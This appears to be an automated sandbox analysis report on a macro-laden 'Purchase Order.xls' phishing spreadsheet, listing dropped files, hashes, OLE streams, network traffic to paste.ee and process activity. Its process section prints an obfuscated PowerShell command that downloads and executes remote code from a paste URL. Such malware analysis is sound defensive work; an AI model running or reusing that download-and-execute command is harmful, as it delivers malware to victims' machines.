                                  MD5:116A8BFFAD555412AAD3299B9E5D11D8
                                  SHA1:90F88F29EBE0152466313A345A49E983604D8D50
                                  SHA-256:67F141CFE87A78BF4A49C3B086766AB96619B461D685EE70B1B69F6D21EA5101
                                  SHA-512:F1055F6DFBCFE83B4F3833EF805BE38D8A84DBE5D4DFBD20AB22D05213CEF6F90B8E291E68510D1E7DF51E4716071ACFB96EBEE7947B4183B5B80F1ED617F146
                                  Malicious:false
                                  Reputation:low
                                  Preview: .U.N.0..#....(qa$4BMY.X.....}.X.K.....t.j..A.&.;.q........"j.jvZ.X.Nz.]S....7+0.....j..d.....2...vX.6.p.9......p43..D...A.h...F.\z...2e.6._.L..T.,hx.d..+.V.e......".Q...H.g3-Ay.b....A(l..5U....#.D.!.;5.k.4....nD..[.....*Bv.`...PX{......{Z.....".;a)-.0......yu.$.i....Su.UV..o....9...=J....yw;.....#.....y/..&...>.P.....|$..w.,..(:.....4..\.O....c...|....=>T.o.._?.{.k.C..]...H.<....{_F... &....l......:. ./...m..g.?.......PK..........!.L!.e............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Mar 22 18:32:33 2021, atime=Mon Mar 22 18:32:33 2021, length=8192, window=hide
                                  Category:dropped
                                  Size (bytes):867
                                  Entropy (8bit):4.491853878237971
                                  Encrypted:false
                                  SSDEEP:12:85QPENcLgXg/XAlCPCHaX7B8NB/H6X+WnicvbsaRbDtZ3YilMMEpxRljKkdMTdJU:85oENK/XTr6NUYehtDv3qNArNru/
                                  MD5:5E04B0F91F2D8E8BDA7D63845413925B
                                  SHA1:0939806337FC64FD1AD921D78B47CD1918F3BD98
                                  SHA-256:BEE1BA4E2A53E3A5AABFFDBDD60EED294B05EA4FB0718118B27C4F5FA8965F21
                                  SHA-512:B5898B970E79612E6D77B49E757B767B6F5A615B6813BB0FD97009BE4CC16380540265CC00E90CA377ED761D2A5D2C86B2062DA779FB5CF7E4D368A32EFD5D9A
                                  Malicious:false
                                  Reputation:low
                                  Preview: L..................F...........7G....Y.R.....Y.R.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....vR....Desktop.d......QK.XvR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase Order.LNK
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Mon Mar 22 18:32:33 2021, atime=Mon Mar 22 18:32:33 2021, length=75776, window=hide
                                  Category:dropped
                                  Size (bytes):2068
                                  Entropy (8bit):4.551983478945256
                                  Encrypted:false
                                  SSDEEP:48:862/XT+Nn39GrNAQh262/XT+Nn39GrNAQ/:862/X6Nn3wrNAQh262/X6Nn3wrNAQ/
                                  MD5:04802A178CAC0B3027F2A4D36480DB4C
                                  SHA1:F91260664166B7673E4F1F2220D2BA18EF444E04
                                  SHA-256:005FC2B84DA9B1DFD971E603EF3095C32BAD0D941207A99062E4E6E263F38A88
                                  SHA-512:7B199F8EF6D6A9B18EA120ACFB5EEAA26F47031345E01DF7EBB1084F4734B6F8D8BE6693010735AA13E91A0FFCB1E909109222A2EE5ACAF91303DFF4BB0BE923
                                  Malicious:false
                                  Reputation:low
                                  Preview: L..................F.... ........{....U.R.....Y.R....(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....vR.. .PURCHA~1.XLS..R.......Q.y.Q.y*...8.....................P.u.r.c.h.a.s.e. .O.r.d.e.r...x.l.s.......|...............-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\Purchase Order.xls.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .O.r.d.e.r...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N...W...9F.C...........[D_
                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):95
                                  Entropy (8bit):4.583021560987025
                                  Encrypted:false
                                  SSDEEP:3:oyBVomM/N4q8Fot34q8FomM/N4q8Fov:dj6KJmoJ6KJy
                                  MD5:4C4137915B1BBF59B919FB7E3E74F6B8
                                  SHA1:6B5AF20A553E4087E6BA708E4F285DDB0C4359A0
                                  SHA-256:E94A7F29966D9B98E77A36828C909C108ABEF4175B284C8E742B091E8EB96F2F
                                  SHA-512:FEB919210819C616906C64206C5F8E2E43AE090CECCCE7F156CEA0FDB2A4FC0F8CECF3D1F0B9E6D3A544BEA895B7117ECB09EAD542143C410510E7827F3CF5DB
                                  Malicious:false
                                  Reputation:low
                                  Preview: Desktop.LNK=0..[xls]..Purchase Order.LNK=0..Purchase Order.LNK=0..[xls]..Purchase Order.LNK=0..
                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L0Z2GMEQFFQY30TM0WYN.temp
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):8016
                                  Entropy (8bit):3.5869081049805867
                                  Encrypted:false
                                  SSDEEP:96:chQCsMq+qvsqvJCwonAz8hQCsMq+qvsEHyqvJCwortAz1PYbHEAf8IWlUVJAIu:cyDoAz8yXHnorKz1af8I4Iu
                                  MD5:19F401D66A12830AE9F93B9F1EDBE7C7
                                  SHA1:33A1EF99E8C0B728E272A73E13908632D7C0673D
                                  SHA-256:FE9034A6C9D1DE20AB04CC3751BD2C1C044462180971631C0B1508ACE803AB74
                                  SHA-512:13CAF5F6B234EFA8F14930D526017FA1D52733517A6571F15443E116A3F11131EC465151DD9201F3A8150DAB9DCCE2C864703ED57DBACC31EEAD5E27FE6E58A4
                                  Malicious:false
                                  Reputation:low
                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                  C:\Users\user\Desktop\4DBE0000
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Category:dropped
                                  Size (bytes):84305
                                  Entropy (8bit):6.171000466677944
                                  Encrypted:false
                                  SSDEEP:1536:kk3hOdsylKlgryzc4bNhZFGzE+cL2knAWTTy6RetZiJ3i4ciS1Tik3hOdsylKlgR:kk3hOdsylKlgryzc4bNhZFGzE+cL2knH
                                  MD5:45FF9E9DA33303554F9314580E32B264
                                  SHA1:0FBCD704F4E64E6CE3F8048CDC9704067B024A63
                                  SHA-256:41A376BB0320BD6FC91E3B08B88F73BC5C5AA14F132BAA267ABA222DBD42CFFC
                                  SHA-512:4F7D33E5163104F355EA23F0D4A7D96815BDFC5FCD62D29AA10BDBBF606003C84E7A19F22D97AF41080FEFDC4A51C32A82DE6FE43DEEC3C6ADBCB4E28EE955F9
                                  Malicious:false
                                  Reputation:low
                                  Preview: ........g2..........................\.p....user B.....a.........=...............................................=........K8"8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.
                                  C:\Users\user\Desktop\591F0000
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Category:modified
                                  Size (bytes):84305
                                  Entropy (8bit):6.171061273911118
                                  Encrypted:false
                                  SSDEEP:1536:kk3hOdsylKlgryzc4bNhZFGzE+cL2knA7TTy6RetZiJ3i4ciS1TMGk3hOdsylKlm:kk3hOdsylKlgryzc4bNhZFGzE+cL2knL
                                  MD5:42F55F16A2D0FDE8B4E48D5B73CF5A9C
                                  SHA1:C96E2AD0400FA6FD5AEBBE407F0A1A2F03FBA01A
                                  SHA-256:337D33E209FDF7E9CFD69C8838BCB265120A9AAE0938092191C3F2C2DC28C939
                                  SHA-512:667E98CD3CA8D3AFC1C8D5DACAF7B8D5C4E3D36A9671ED44EA5E9505EF4A2DF851F46DA9E1722F47BD69B386E5F5ACEF46D902C64171030B104030BE4889558D
                                  Malicious:false
                                  Reputation:low
                                  Preview: ........g2..........................\.p....user B.....a.........=...............................................=........K8"8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.

                                  Static File Info

                                  General

                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows-Benutzer, Last Saved By: TAI OLOTU, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Oct 22 08:10:34 2019, Last Saved Time/Date: Mon Mar 22 08:24:28 2021, Security: 0
                                  Entropy (8bit):6.229725096519657
                                  TrID:
                                  • Microsoft Excel sheet (30009/1) 45.83%
                                  • Microsoft Works Spreadsheet (27457/6) 41.94%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.23%
                                  File name:Purchase Order.xls
                                  File size:69632
                                  MD5:25d108bb3181b08a9fb2edc6713323b2
                                  SHA1:e9983f38587f57213137c534be223a8931e33e2c
                                  SHA256:744cfa43336e162820a03f1a6b2ff7fa9d2471f92f14691c5f59156c634d8015
                                  SHA512:2149c566ba34cdc552bcd64db23aef5248092a88c7e9f370f2388cd10e9b78166f14453c6cb18979af527e791fb3bffbfe27d17519d9dcd1a894ca4704f24087
                                  SSDEEP:1536:3k3hOdsylKlgryzc4bNhZFGzE+cL2knAPTTy6FetZiJ3K4siS1E:3k3hOdsylKlgryzc4bNhZFGzE+cL2knL
                                  File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                                  File Icon

                                  Icon Hash:e4eea286a4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OLE
                                  Number of OLE Files:1

                                  OLE File "Purchase Order.xls"

                                  Indicators

                                  Has Summary Info:True
                                  Application Name:Microsoft Excel
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:True

                                  Summary

                                  Code Page:1252
                                  Author:Windows-Benutzer
                                  Last Saved By:TAI OLOTU
                                  Create Time:2019-10-22 07:10:34
                                  Last Saved Time:2021-03-22 08:24:28
                                  Creating Application:Microsoft Excel
                                  Security:0

                                  Document Summary

                                  Document Code Page:1252
                                  Thumbnail Scaling Desired:False
                                  Company:
                                  Contains Dirty Links:False
                                  Shared Document:False
                                  Changed Hyperlinks:False
                                  Application Version:1048576

                                  Streams

                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                                  General
                                  Stream Path:\x1CompObj
                                  File Type:data
                                  Stream Size:108
                                  Entropy:4.18849998853
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 264
                                  General
                                  Stream Path:\x5DocumentSummaryInformation
                                  File Type:data
                                  Stream Size:264
                                  Entropy:2.81921798866
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s .
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b5 00 00 00
                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 224
                                  General
                                  Stream Path:\x5SummaryInformation
                                  File Type:data
                                  Stream Size:224
                                  Entropy:3.74951166661
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . d . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s - B e n u t z e r . . . . . . . . . . . . T A I O L O T U . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . Q . . . . . . @ . . . . . c . . . . . . . . . . . . .
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 14 00 00 00
                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 65069
                                  General
                                  Stream Path:Workbook
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Stream Size:65069
                                  Entropy:6.39685503271
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T A I O L O T U B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . Z 8 " 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 54 41 49 20 4f 4c 4f 54 55 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Mar 22, 2021 12:33:02.797185898 CET4916580192.168.2.22172.67.219.133
                                  Mar 22, 2021 12:33:02.845032930 CET8049165172.67.219.133192.168.2.22
                                  Mar 22, 2021 12:33:02.845151901 CET4916580192.168.2.22172.67.219.133
                                  Mar 22, 2021 12:33:02.848402977 CET4916580192.168.2.22172.67.219.133
                                  Mar 22, 2021 12:33:02.895872116 CET8049165172.67.219.133192.168.2.22
                                  Mar 22, 2021 12:33:02.905740976 CET8049165172.67.219.133192.168.2.22
                                  Mar 22, 2021 12:33:02.905761957 CET8049165172.67.219.133192.168.2.22
                                  Mar 22, 2021 12:33:02.905849934 CET4916580192.168.2.22172.67.219.133
                                  Mar 22, 2021 12:33:02.972100973 CET49166443192.168.2.22104.21.45.223
                                  Mar 22, 2021 12:33:03.024660110 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.024756908 CET49166443192.168.2.22104.21.45.223
                                  Mar 22, 2021 12:33:03.035932064 CET49166443192.168.2.22104.21.45.223
                                  Mar 22, 2021 12:33:03.087932110 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.092530012 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.092575073 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.092648029 CET49166443192.168.2.22104.21.45.223
                                  Mar 22, 2021 12:33:03.109757900 CET49166443192.168.2.22104.21.45.223
                                  Mar 22, 2021 12:33:03.161989927 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.162034988 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.365981102 CET49166443192.168.2.22104.21.45.223
                                  Mar 22, 2021 12:33:03.401017904 CET49166443192.168.2.22104.21.45.223
                                  Mar 22, 2021 12:33:03.452528954 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.825649977 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.825782061 CET44349166104.21.45.223192.168.2.22
                                  Mar 22, 2021 12:33:03.825948000 CET49166443192.168.2.22104.21.45.223
                                  Mar 22, 2021 12:33:04.067735910 CET4916580192.168.2.22172.67.219.133
                                  Mar 22, 2021 12:33:04.067756891 CET49166443192.168.2.22104.21.45.223

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Mar 22, 2021 12:33:02.718683004 CET5219753192.168.2.228.8.8.8
                                  Mar 22, 2021 12:33:02.779618979 CET53521978.8.8.8192.168.2.22
                                  Mar 22, 2021 12:33:02.911490917 CET5309953192.168.2.228.8.8.8
                                  Mar 22, 2021 12:33:02.971030951 CET53530998.8.8.8192.168.2.22

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Mar 22, 2021 12:33:02.718683004 CET192.168.2.228.8.8.80xad13Standard query (0)paste.eeA (IP address)IN (0x0001)
                                  Mar 22, 2021 12:33:02.911490917 CET192.168.2.228.8.8.80xb648Standard query (0)paste.eeA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Mar 22, 2021 12:33:02.779618979 CET8.8.8.8192.168.2.220xad13No error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                  Mar 22, 2021 12:33:02.779618979 CET8.8.8.8192.168.2.220xad13No error (0)paste.ee104.21.45.223A (IP address)IN (0x0001)
                                  Mar 22, 2021 12:33:02.971030951 CET8.8.8.8192.168.2.220xb648No error (0)paste.ee104.21.45.223A (IP address)IN (0x0001)
                                  Mar 22, 2021 12:33:02.971030951 CET8.8.8.8192.168.2.220xb648No error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • paste.ee

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249165172.67.219.13380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampkBytes transferredDirectionData
                                  Mar 22, 2021 12:33:02.848402977 CET0OUTGET /r/r87uc HTTP/1.1
                                  Host: paste.ee
                                  Connection: Keep-Alive
                                  Mar 22, 2021 12:33:02.905740976 CET1INHTTP/1.1 301 Moved Permanently
                                  Date: Mon, 22 Mar 2021 11:33:02 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: __cfduid=df7a8fba126751f199c068da7a8af35391616412782; expires=Wed, 21-Apr-21 11:33:02 GMT; path=/; domain=.paste.ee; HttpOnly; SameSite=Lax
                                  Location: https://paste.ee/r/r87uc
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 50
                                  cf-request-id: 08fb4ec9220000203fca9a8000000001
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lOv%2B03emZ1Wrgfx7X5SNrq6wsh273KEAW4BIVXNO%2BobkysVZLjaCD%2FOj2LdfXGKUXfi3JlpLcIUoDcEWHoNC53456lgZW3op3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                  Server: cloudflare
                                  CF-RAY: 633f1a550f81203f-AMS
                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>
                                  Mar 22, 2021 12:33:02.905761957 CET1INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  HTTPS Packets

                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                  Mar 22, 2021 12:33:03.092575073 CET104.21.45.223443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Start time:12:32:31
                                  Start date:22/03/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                  Imagebase:0x13ff00000
                                  File size:27641504 bytes
                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:12:32:34
                                  Start date:22/03/2021
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
                                  Imagebase:0x13f9e0000
                                  File size:473600 bytes
                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Executed Functions

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2087724957.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2305c735c80e1bcc1e6923119ef3189ba800627f6f0291410ade9b8ead24735
                                    • Instruction ID: 3bb90d8606b1bc68d55225b55189cf8d1d806918bc5f400cb88f2e7af03ff82d
                                    • Opcode Fuzzy Hash: b2305c735c80e1bcc1e6923119ef3189ba800627f6f0291410ade9b8ead24735
                                    • Instruction Fuzzy Hash: A73102A690E7C20FEB4347385CA56A17FB09F27215B5E04E7C084CB0A3E95C9D59C762
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions